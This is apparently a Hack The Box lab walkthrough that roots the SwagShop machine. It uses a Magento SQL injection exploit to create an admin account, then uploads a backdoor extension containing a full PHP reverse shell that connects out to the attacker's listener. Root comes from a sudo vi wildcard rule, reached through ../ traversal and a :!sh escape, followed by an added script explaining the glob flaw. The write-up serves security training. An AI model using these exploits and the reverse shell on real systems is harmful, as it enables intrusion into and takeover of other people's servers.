
Hack the Box - Swagshop

Hi there, this is the SwagShop machine walkthrough: an easy box with a poor connection 😒 that kept getting reset by other users. Once we get root on this box, we can try the beta version of the Hack The Box store 😎.

Information

  • OS: Linux
  • IP: 10.10.10.140
  • Difficulty: Easy

Enumeration

First, let's start with an nmap scan for the open ports.

# nmap -sV -sC -A -Pn 10.10.10.140
Starting Nmap 7.30 ( https://nmap.org ) at 2019-06-04 15:55 KST
Nmap scan report for 10.10.10.140
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|_  256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.17 seconds

SSH is running, but I don't have any credentials for it, so let's see what port 80 serves. It is a web shop whose page title says Magento. I googled Magento: it is an eCommerce platform written in PHP.

SwagShop Magento

Magento SQL Injection Vulnerability

I start searching Google for Magento vulnerabilities, and the first thing that comes up is an SQL injection affecting some versions of Magento.

Hmmm... I didn't check the Magento version, but I still try searching Google for magento sql injection exploit db.

Yeah, the first result from Google is interesting: Exploit-DB entry 37977, the Python rewrite of the Magento "Shoplift" SQL injection (CVE-2015-1397), which adds an admin user to the database without any authentication. I download the exploit code and modify it by changing the target as below.

target = "http://10.10.10.140/index.php"

And run the code.

# python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme

The SQL injection script works. I log in with the username forme and password forme and land in the admin panel.

Magento Admin panel

Shell Uploading

Normally, after logging in to a dashboard, I look for a place to upload a file or a shell. But the Magento dashboard is new to me, so I do some more googling for help xD.

After searching for magento upload shell and watching some videos on YouTube, I find a place to upload files: the Magento Connect Manager at http://10.10.10.140/downloader, where I log in with the same username and password. I try to upload a PHP shell directly, but it isn't allowed, since the manager only accepts extension package files.

Magento file upload

So, I search for magento shell and find a ready-made backdoor extension (LINK). Since the source code is provided, we can put the reverse shell code inside its PHP controller (that may be easier, lol).

I modify the IndexController.php file inside Backdoor Code/app/code/community/Lavalamp/Connector/controllers/ by adding the reverse shell script as follows. The shell code sits at the top level of the file, so it executes as soon as Magento includes the controller, before indexAction() is ever called.

<?php
// pentestmonkey-style PHP reverse shell. It sits at the top level of the
// controller file, so it runs as soon as Magento includes the file.
// Replace my_ip_address and 1234 with your listener's address and port.
set_time_limit (0);
$VERSION = "1.0";
$ip = 'my_ip_address';   // attacker IP (placeholder)
$port = 1234;            // must match the netcat listener port
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';   // sent to the listener first, then an interactive sh
$daemon = 0;
$debug = 0;
if (function_exists('pcntl_fork')) {
	$pid = pcntl_fork();
	if ($pid == -1) {
		printit("ERROR: Can't fork");
		exit(1);
	}
	if ($pid) {
		exit(0);  // Parent exits
	}
	if (posix_setsid() == -1) {
		printit("Error: Can't setsid()");
		exit(1);
	}
	$daemon = 1;
} else {
	printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
	printit("$errstr ($errno)");
	exit(1);
}
$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
	printit("ERROR: Can't spawn shell");
	exit(1);
}
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
	if (feof($sock)) {
		printit("ERROR: Shell connection terminated");
		break;
	}
	if (feof($pipes[1])) {
		printit("ERROR: Shell process terminated");
		break;
	}
	$read_a = array($sock, $pipes[1], $pipes[2]);
	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
	if (in_array($sock, $read_a)) {
		if ($debug) printit("SOCK READ");
		$input = fread($sock, $chunk_size);
		if ($debug) printit("SOCK: $input");
		fwrite($pipes[0], $input);
	}
	if (in_array($pipes[1], $read_a)) {
		if ($debug) printit("STDOUT READ");
		$input = fread($pipes[1], $chunk_size);
		if ($debug) printit("STDOUT: $input");
		fwrite($sock, $input);
    }
	if (in_array($pipes[2], $read_a)) {
		if ($debug) printit("STDERR READ");
		$input = fread($pipes[2], $chunk_size);
		if ($debug) printit("STDERR: $input");
		fwrite($sock, $input);
	}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
function printit ($string) {
	if (!$daemon) {
		print "$string\n";
	}
}
// The controller class Magento expects for the lavalamp/index route.
// The reverse shell above runs at include time, before this class is used.
class Lavalamp_Connector_IndexController extends Mage_Core_Controller_Front_Action
{
    public function indexAction()
    {
        echo "<h1>Ehhh xD</h1>";
    }
}
?>

After modifying it, I simply follow the README.md instructions to re-package the files. The tar command has to be run from inside the Backdoor Code directory, so that app, package.xml and skin sit at the root of the archive.

cd Backdoor\ Code
tar -czvf xd.tgz app package.xml skin
mv xd.tgz ..

Now I can upload the xd.tgz package, with the reverse shell inside, to the server through the Connect Manager.

Get access to the machine

On my machine, I run netcat -lvnp 1234 as the reverse shell listener. Then I just trigger the uploaded reverse shell by opening the link http://10.10.10.140/index.php/lavalamp/index, which routes to the module's IndexController.

Now I'm in the machine as www-data user.

$ netcat -lvnp 1234
Connection from 10.10.10.140:54626
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 04:13:14 up 0 min,  0 users,  load average: 0.29, 0.08, 0.02
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@swagshop:/$ ls /home
haris
www-data@swagshop:/$ cd /home/haris
www-data@swagshop:/home/haris$ ls -l
-rw-r--r-- 1 haris haris 33 May  8 09:01 user.txt
www-data@swagshop:/home/haris$ cat user.txt
a4****************************c8

Root

I start by searching for exploits for this kernel version, but none of them seems to work.

www-data@swagshop:/home/haris$ uname -a
Linux swagshop 4.4.0-146-generic #172-Ubuntu SMP Wed Apr 3 09:00:08 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

I try a lot of methods, but nothing works. Finally, after searching Google for help, I run sudo -l and see something interesting.

www-data@swagshop:/home/haris$ sudo -l
Matching Defaults entries for www-data on swagshop:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on swagshop:
    (root) NOPASSWD: /usr/bin/vi /var/www/html/*
www-data@swagshop:/home/haris$ 

As I read it, user www-data can run vi as root, without a password, on anything under /var/www/html. So I first run sudo vi, but it prompts for a password. Then I try the full path of vi, and it still asks for a password. The reason is that sudo matches the whole command line against the rule: /usr/bin/vi with no argument does not match /usr/bin/vi /var/www/html/*, so sudo falls through to the normal password prompt. This time I pass a path inside the allowed directory /var/www/html.

www-data@swagshop:/home/haris$ sudo /usr/bin/vi /var/www/html/test.txt

It works: I have created a file named test.txt as root.

www-data@swagshop:/var/www/html$ ls -l | grep test
-rw-r--r--  1 root     root          5 Jun  4 04:31 test.txt

The rule allows /var/www/html/*, i.e. any argument whose text starts with /var/www/html/. sudo compares the argument as a string against that wildcard (a * in an argument also matches /) and does not canonicalise the path first, so an argument containing ../ still matches. I use ../ to walk back up to / and open /root/root.txt.

www-data@swagshop:/var/www/html$ sudo /usr/bin/vi /var/www/html/../../../root/root.txt

Now I have the root flag xD

c2****************************21

   ___ ___
 /| |/|\| |\
/_| ´ |.` |_\           We are open! (Almost)
  |   |.  |
  |   |.  |         Join the beta HTB Swag Store!
  |___|.__|       https://hackthebox.store/password

                   PS: Use root flag as password!
~
~
"/var/www/html/../../../root/root.txt" 10L, 270C              1,1           All
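To make the matching behaviour concrete, here is an added example (my own script, not part of the original post or of sudo itself) that emulates how sudoers compares a command-line argument against the pattern /var/www/html/* and contrasts it with the canonicalising check that sudo does not perform. The shell's own glob matching is used as a stand-in for sudo's fnmatch-style matching; the paths and the rule are taken from the sudo -l output above and nothing is touched on disk.

```shell
#!/bin/sh
# Added example: why "(root) NOPASSWD: /usr/bin/vi /var/www/html/*" lets
# www-data open /root/root.txt. sudoers matches command-line arguments with
# wildcards where '*' also matches '/', so the check is purely lexical and
# "/var/www/html/../../../root/root.txt" satisfies the pattern even though
# the file is not under /var/www/html.

# Emulate the sudoers argument match. An unquoted variable used as a case
# pattern is glob-matched by the shell, and the shell's '*' matches '/' too.
sudoers_glob_allows() {
  pattern=$1
  arg=$2
  case "$arg" in
    $pattern) return 0 ;;
  esac
  return 1
}

# Collapse '.' and '..' components of an absolute path as a pure string
# operation (no filesystem access, symlinks are not resolved).
normalize_path() {
  out=""
  old_ifs=$IFS
  IFS=/
  for comp in $1; do
    case "$comp" in
      ""|.) ;;                      # empty field (leading slash, //) or '.'
      ..) out=${out%/*} ;;          # pop one component
      *) out="$out/$comp" ;;
    esac
  done
  IFS=$old_ifs
  printf '%s\n' "${out:-/}"
}

# The check sudo does not do: canonicalise first, then require the prefix.
stays_under() {
  base=$1
  canon=$(normalize_path "$2")
  case "$canon" in
    "$base"/*) return 0 ;;
  esac
  return 1
}

demo() {
  rule='/var/www/html/*'
  for f in /var/www/html/test.txt /var/www/html/../../../root/root.txt; do
    if sudoers_glob_allows "$rule" "$f"; then verdict=allowed; else verdict=denied; fi
    if stays_under /var/www/html "$f"; then inside=yes; else inside=no; fi
    printf '%-45s sudo-glob:%-8s canonical:%-18s under /var/www/html:%s\n' \
      "$f" "$verdict" "$(normalize_path "$f")" "$inside"
  done
}

demo
```

Both paths pass the glob, only the first survives the canonical check. Note that a canonical check alone would not have saved this box: vi is still running as root, and its :! escape hands out a root shell whatever file was opened. The rule should use sudoedit, which edits a copy of the file as the invoking user, or simply not exist.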

If you want a root shell, just type :!sh inside vi (the same way you type :q to exit). vi itself is running as root here, so the command it spawns runs as root too.

~
~
:!sh
# id
uid=0(root) gid=0(root) groups=0(root)
# python3 -c "import pty;pty.spawn('/bin/bash')"
root@swagshop:/var/www/html# 

Rooted! Now let's go to the SwagShop and explore some stuff xD

I ordered a t-shirt from the SwagShop. Using the root flag as the password, I got free shipping from the HTB store, and here it is...

HTB T-shirt
